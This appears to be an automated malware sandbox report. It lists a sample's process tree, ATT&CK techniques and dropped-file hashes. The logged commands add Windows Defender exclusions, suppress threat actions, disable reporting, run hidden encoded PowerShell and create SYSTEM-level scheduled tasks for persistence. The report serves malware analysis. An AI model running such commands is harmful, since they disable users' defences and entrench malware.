C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32 | level 3 | PID:3916
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64 | level 3 | PID:5076
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64 | level 3 | PID:1960
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32 | level 3 | PID:1096
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32 | level 3 | PID:3976
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32 | level 3 | PID:2204
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CZfHRXFHxTaU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CZfHRXFHxTaU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ERBaCPwFCvNPKhBUWKR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ERBaCPwFCvNPKhBUWKR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QqECRSyvRyPgC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QqECRSyvRyPgC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XdSXIRHhU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XdSXIRHhU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nJAAWeDPVVUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nJAAWeDPVVUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ZHPKbjSENnMKZrVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ZHPKbjSENnMKZrVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\kgFvdrWtvTuDliNJn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\kgFvdrWtvTuDliNJn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\kIqALRPQQwlbskwL\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\kIqALRPQQwlbskwL\" /t REG_DWORD /d 0 /reg:64;" | level 2 | PID:4700
C:\Windows\SysWOW64\cmd.exe | "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CZfHRXFHxTaU2" /t REG_DWORD /d 0 /reg:32 | level 3 | PID:3172
C:\Windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CZfHRXFHxTaU2" /t REG_DWORD /d 0 /reg:32 | level 4 | PID:1516
  - UAC bypass
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 | level 4 | PID:316
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CZfHRXFHxTaU2" /t REG_DWORD /d 0 /reg:64 | level 3 | PID:1408
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ERBaCPwFCvNPKhBUWKR" /t REG_DWORD /d 0 /reg:64 | level 3 | PID:4660
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nJAAWeDPVVUn" /t REG_DWORD /d 0 /reg:32 | level 3 | PID:1072
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ZHPKbjSENnMKZrVB /t REG_DWORD /d 0 /reg:32 | level 3 | PID:2356
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\kgFvdrWtvTuDliNJn /t REG_DWORD /d 0 /reg:64 | level 3 | PID:2040
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\kIqALRPQQwlbskwL /t REG_DWORD /d 0 /reg:64 | level 3 | PID:4788
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\kIqALRPQQwlbskwL /t REG_DWORD /d 0 /reg:32 | level 3 | PID:1380
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\kgFvdrWtvTuDliNJn /t REG_DWORD /d 0 /reg:32 | level 3 | PID:616
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64 | level 3 | PID:1044
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32 | level 3 | PID:2012
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ZHPKbjSENnMKZrVB /t REG_DWORD /d 0 /reg:64 | level 3 | PID:1068
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nJAAWeDPVVUn" /t REG_DWORD /d 0 /reg:64 | level 3 | PID:1976
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XdSXIRHhU" /t REG_DWORD /d 0 /reg:64 | level 3 | PID:3040
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XdSXIRHhU" /t REG_DWORD /d 0 /reg:32 | level 3 | PID:1748
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QqECRSyvRyPgC" /t REG_DWORD /d 0 /reg:64 | level 3 | PID:4932
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QqECRSyvRyPgC" /t REG_DWORD /d 0 /reg:32 | level 3 | PID:436
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ERBaCPwFCvNPKhBUWKR" /t REG_DWORD /d 0 /reg:32 | level 3 | PID:60
C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "gpgDPWFcb" /SC once /ST 13:10:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" | level 2 | PID:3480
  - Creates scheduled task(s)
C:\Windows\SysWOW64\schtasks.exe | schtasks /run /I /tn "gpgDPWFcb" | level 2 | PID:2364
C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "gpgDPWFcb" | level 2 | PID:4376
C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "tyUrxYbocxeCOlnue" /SC once /ST 05:45:17 /RU "SYSTEM" /TR "\"C:\Windows\Temp\kIqALRPQQwlbskwL\JYLtwGyaVCnpLhJ\PMziazW.exe\" wx /oqsite_idWKR 385118 /S" /V1 /F | level 2 | PID:3172
  - Creates scheduled task(s)
C:\Windows\SysWOW64\schtasks.exe | schtasks /run /I /tn "tyUrxYbocxeCOlnue" | level 2 | PID:4384
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== | level 1 | PID:3476
C:\Windows\Temp\kIqALRPQQwlbskwL\JYLtwGyaVCnpLhJ\PMziazW.exe | C:\Windows\Temp\kIqALRPQQwlbskwL\JYLtwGyaVCnpLhJ\PMziazW.exe wx /oqsite_idWKR 385118 /S | level 1 | PID:1096
C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "bQqfrfOcqJXaOOvqOO" | level 2 | PID:2272
C:\Windows\SysWOW64\cmd.exe | cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32 | level 2 | PID:2204
C:\Windows\SysWOW64\reg.exe | REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32 | level 3 | PID:2384
C:\Windows\SysWOW64\cmd.exe | cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64 | level 2 | PID:4384
C:\Windows\SysWOW64\reg.exe | REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64 | level 3 | PID:4344
C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\XdSXIRHhU\pavAWp.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "sVfPsEIPBSnpwys" /V1 /F | level 2 | PID:2244
  - Creates scheduled task(s)
C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "sVfPsEIPBSnpwys2" /F /xml "C:\Program Files (x86)\XdSXIRHhU\fJNLPkY.xml" /RU "SYSTEM" | level 2 | PID:5276
  - Creates scheduled task(s)
C:\Windows\SysWOW64\schtasks.exe | schtasks /END /TN "sVfPsEIPBSnpwys" | level 2 | PID:5176
C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "sVfPsEIPBSnpwys" | level 2 | PID:4720
C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "yurPLWjCznwNCq" /F /xml "C:\Program Files (x86)\CZfHRXFHxTaU2\ykIeUQB.xml" /RU "SYSTEM" | level 2 | PID:1388
  - Creates scheduled task(s)
C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "YKeQNDFprqTiy2" /F /xml "C:\ProgramData\ZHPKbjSENnMKZrVB\VjmaUYB.xml" /RU "SYSTEM" | level 2 | PID:5920
  - Creates scheduled task(s)
C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "cZWesaImmWMWSirmA2" /F /xml "C:\Program Files (x86)\ERBaCPwFCvNPKhBUWKR\ZNvAarE.xml" /RU "SYSTEM" | level 2 | PID:6028
  - Creates scheduled task(s)
C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "ioemHMgjvioeHnMgNrq2" /F /xml "C:\Program Files (x86)\QqECRSyvRyPgC\oYJwUDX.xml" /RU "SYSTEM" | level 2 | PID:1168
  - Creates scheduled task(s)
C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "RihWzGLSFaMWbYlMN" /SC once /ST 00:56:47 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\kIqALRPQQwlbskwL\uMprLGKH\WVZckrO.dll\",#1 /Mfsite_idavC 385118" /V1 /F | level 2 | PID:5328
  - Creates scheduled task(s)
C:\Windows\SysWOW64\schtasks.exe | schtasks /run /I /tn "RihWzGLSFaMWbYlMN" | level 2 | PID:5236
C:\Windows\SysWOW64\cmd.exe | cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32 | level 2 | PID:5756
C:\Windows\SysWOW64\reg.exe | REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32 | level 3 | PID:664
C:\Windows\SysWOW64\cmd.exe | cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64 | level 2 | PID:5436
C:\Windows\SysWOW64\reg.exe | REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64 | level 3 | PID:4728
C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "tyUrxYbocxeCOlnue" | level 2 | PID:4944
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe | C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe | level 1 | PID:6048
\??\c:\windows\system32\rundll32.EXE | c:\windows\system32\rundll32.EXE "C:\Windows\Temp\kIqALRPQQwlbskwL\uMprLGKH\WVZckrO.dll",#1 /Mfsite_idavC 385118 | level 1 | PID:5188
C:\Windows\SysWOW64\rundll32.exe | c:\windows\system32\rundll32.EXE "C:\Windows\Temp\kIqALRPQQwlbskwL\uMprLGKH\WVZckrO.dll",#1 /Mfsite_idavC 385118 | level 2 | PID:5580
C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "RihWzGLSFaMWbYlMN" | level 3 | PID:5768
C:\Windows\system32\OpenWith.exe | C:\Windows\system32\OpenWith.exe -Embedding | level 1 | PID:5596
C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /f | level 1 | PID:2356
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f | level 1 | PID:6140
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f | level 1 | PID:2148
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 12 /tr "'C:\Windows\it-IT\wscript.exe'" /f | level 1 | PID:4800
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Windows\it-IT\wscript.exe'" /rl HIGHEST /f | level 1 | PID:1956
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 11 /tr "'C:\Windows\it-IT\wscript.exe'" /rl HIGHEST /f | level 1 | PID:5580
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "AppLaunchA" /sc MINUTE /mo 11 /tr "'C:\odt\AppLaunch.exe'" /f | level 1 | PID:4016
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "AppLaunch" /sc ONLOGON /tr "'C:\odt\AppLaunch.exe'" /rl HIGHEST /f | level 1 | PID:5104
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\WmiPrvSE.exe'" /f | level 1 | PID:1380
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "AppLaunchA" /sc MINUTE /mo 10 /tr "'C:\odt\AppLaunch.exe'" /rl HIGHEST /f | level 1 | PID:6020
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default User\WmiPrvSE.exe'" /rl HIGHEST /f | level 1 | PID:6044
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\WmiPrvSE.exe'" /rl HIGHEST /f | level 1 | PID:6056
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "tuc2t" /sc MINUTE /mo 11 /tr "'C:\Windows\DigitalLocker\tuc2.exe'" /f | level 1 | PID:5692
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "tuc2" /sc ONLOGON /tr "'C:\Windows\DigitalLocker\tuc2.exe'" /rl HIGHEST /f | level 1 | PID:1964
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "tuc2t" /sc MINUTE /mo 10 /tr "'C:\Windows\DigitalLocker\tuc2.exe'" /rl HIGHEST /f | level 1 | PID:2356
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "OpenWithO" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\OpenWith.exe'" /f | level 1 | PID:6008
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "OpenWith" /sc ONLOGON /tr "'C:\Users\Default User\OpenWith.exe'" /rl HIGHEST /f | level 1 | PID:3104
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "OpenWithO" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\OpenWith.exe'" /rl HIGHEST /f | level 1 | PID:5296
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "tuc6t" /sc MINUTE /mo 8 /tr "'C:\odt\tuc6.exe'" /f | level 1 | PID:3208
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "tuc6" /sc ONLOGON /tr "'C:\odt\tuc6.exe'" /rl HIGHEST /f | level 1 | PID:5444
  - Process spawned unexpected child process
  - Creates scheduled task(s)
C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "tuc6t" /sc MINUTE /mo 13 /tr "'C:\odt\tuc6.exe'" /rl HIGHEST /f | level 1 | PID:5604
  - Process spawned unexpected child process
  - Creates scheduled task(s)
\??\c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService | level 1 | PID:5496
C:\Windows\system32\schtasks.exe | schtasks.exe /create /tn "odg2FEYTs5iKvF4RVV78MLvTo" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\odg2FEYTs5iKvF4RVV78MLvT.exe'" /f | level 1
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5448
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "odg2FEYTs5iKvF4RVV78MLvT" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\odg2FEYTs5iKvF4RVV78MLvT.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5796
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "odg2FEYTs5iKvF4RVV78MLvTo" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\odg2FEYTs5iKvF4RVV78MLvT.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2884
-
\??\c:\windows\system\svchost.exec:\windows\system\svchost.exe1⤵PID:6604
Network
MITRE ATT&CK Enterprise v15
Persistence
- Create or Modify System Process (1)
  - Windows Service (1)
- Pre-OS Boot (1)
  - Bootkit (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (1)
  - Disable or Modify Tools (1)
- Modify Registry (1)
- Pre-OS Boot (1)
  - Bootkit (1)
- Scripting (1)
- Virtualization/Sandbox Evasion (1)
Downloads
-
Filesize
52KB
MD53387961372fe91c2cc69b53180cbfee4
SHA1ede6fb0d2319536efca218d461425d2addffd88e
SHA256dad57975be6833c50d32ee77212addf11a80195d82365ade6042234e492bd845
SHA512f6551803b90934a5555587bc81b4758b21fc8bad1653f298846e2195c797932893d761249f9cf527e95809ffc0bfd785872f0b42f56e8adc64bdb06c63f09c5c
-
Filesize
19KB
MD52bb367fc873587857edafa1a9d6d69d6
SHA1caecd6ebd7d03c5e04144a6f16d13a80129130c0
SHA25648f1f77eab0694510613882e302b68560b485976aeba142b82d113bb7f117f62
SHA5121f38475b1577165aff41115b0cabde2b47d2ef77e1002c260c5b952259134f8827259142a1657b2316c2fbf62b3ef279a0fa9238ebe1ae746b995818406b8d28
-
Filesize
9KB
MD5e0aad6c47922197035c2aaf7f06fb29a
SHA1f613df8586f63d3f4bc6c0127aa589334de407de
SHA256121e4cda9aae7fb5354a915f663d5b423a9d4ce3bc48f660b7b15e0d0b9fe9dc
SHA512ca3a33f80df6e988fa1a1a4973898daab532e3ffb9058c6b2b103f49f985a130febc82fe8811b30a009c8f101118f2a4e91d44a150e1d2ad48fdf0fb985dd8eb
-
Filesize
37KB
MD5d3fe056fb6cb8b3a5f67f92208e5492e
SHA19072d5644d490311f3bd3e6af16fe7f6cc70efe7
SHA2567d34d193cf96b749041b36b9e2c87f75fc8c5898032c925ad0e103502935d9a7
SHA5126f9773320b39eca63e0f9e5bcf5811225e95eced04f6ab444909184a47c5bfa90a15886520aedfab249140035026b0d2175e8efcf948aa79acff1cb46c4d0531
-
Filesize
150KB
MD50162e37378b1269271de6e465a8470a4
SHA1d9dabdbbb6140ccae67bdb6d69e8ca2069683d56
SHA25666264c5fd00c724768d4b5fa263973d67e101b194e5541946d285147f1c5e331
SHA512f6859ea1b5e227fd518ef197a9444aa03b595c5e4eece2fb5f7d0626c7d9c0aac2dedb94aa99a1f2ee1e20c1e5001a7017cc3859acd8a44b74994b21da617111
-
Filesize
96KB
MD5c00956cd2eaaa38a0ed7eaf0d886c05c
SHA1e3aaa2b66808d81acafdbd8ba070bc9b707560b5
SHA2561ff6915f4035ba19bab7417ff107f2d37a7134e84be0e1225a979612fea3caab
SHA512640fa744b110956ba25b346d5a3c913f9364710b402e015345a4eeda68754039f7a795d021eb7c1e11fb6d49addd65db418a4fcfb5755306ae8350345f1af66e
-
Filesize
41KB
MD50251d8f52ee4e44c4bae13ca569676e8
SHA11146d208917cb85dc14d42f454ad8d9e4915ff58
SHA256c3b0cb8a20ef3b0dbad209c1148d09c8fb8856d765951ef9ee487c13f233b089
SHA512a79c753d47e91e7a616af469d1d78a1db9257a9d1b33b48c64cf29b853119181111edfe7c026048784a72ebb9b61b1f798ca3c5faad91322289c0b3c2abb4a38
-
Filesize
12KB
MD5916fe002ded72c276aa8534ec11fd42e
SHA1095e49f954dc72a7a83ce0fa895b8ff8741a284a
SHA256f1e70d9aa3337a8397dfdce51ea905975eb0bc081077e47f2e500f82eb97210d
SHA512b2123fe61bc59b5fea7d085fcbcefc1881708cca6e0882e254008302830a92ac7c2dfbc439257c78164ad8d3ebbc4b2b4ba192f492c185e9eccd3d1fe1fab86b
-
Filesize
43KB
MD5c90082a3cf4895ad3b660d8978ef64bb
SHA1a7820ebd1136dc0c0289623743fa581a1b2d4a45
SHA2569dac5a7ede29461ddaaf9e97c8f5a7c83ad9bcf2132a0e57f35c74244740b268
SHA512622424e0c5e301aa6e16e55bf8266d809502a906c23105c75e3233c2e1fbdce21931a6062d6577cf898f9436881d22e5d0ca3d835e196e5464381ef6a543c4e7
-
Filesize
5KB
MD5b3cc560ac7a5d1d266cb54e9a5a4767e
SHA1e169e924405c2114022674256afc28fe493fbfdf
SHA256edde733a8d2ca65c8b4865525290e55b703530c954f001e68d1b76b2a54edcb5
SHA512a836decacb42cc3f7d42e2bf7a482ae066f5d1df08cccc466880391028059516847e1bf71e4c6a90d2d34016519d16981ddeeacfb94e166e4a9a720d9cc5d699
-
Filesize
25KB
MD5bd7a443320af8c812e4c18d1b79df004
SHA137d2f1d62fec4da0caf06e5da21afc3521b597aa
SHA256b634ab5640e258563c536e658cad87080553df6f34f62269a21d554844e58bfe
SHA51221aef7129b5b70e3f9255b1ea4dc994bf48b8a7f42cd90748d71465738d934891bbec6c6fc6a1ccfaf7d3f35496677d62e2af346d5e8266f6a51ae21a65c4460
-
Filesize
8KB
MD51ebe067315dde2d1c0bb36e14dde8877
SHA10bae530ccfbc02a0d8e2f1460fe9ad78d3ae22ac
SHA2568a16c140a284ab0fda47fb8eb3acd0e1c857549bc06278c592fef785fa310f67
SHA512debbcd8e09c45c6214b9825140ae95ff16f6539e20823ec46723b5a694af8b3a677b7e47e98857498f37583c8e76382fea82d0fb3d379fd69b46241d248f769e
-
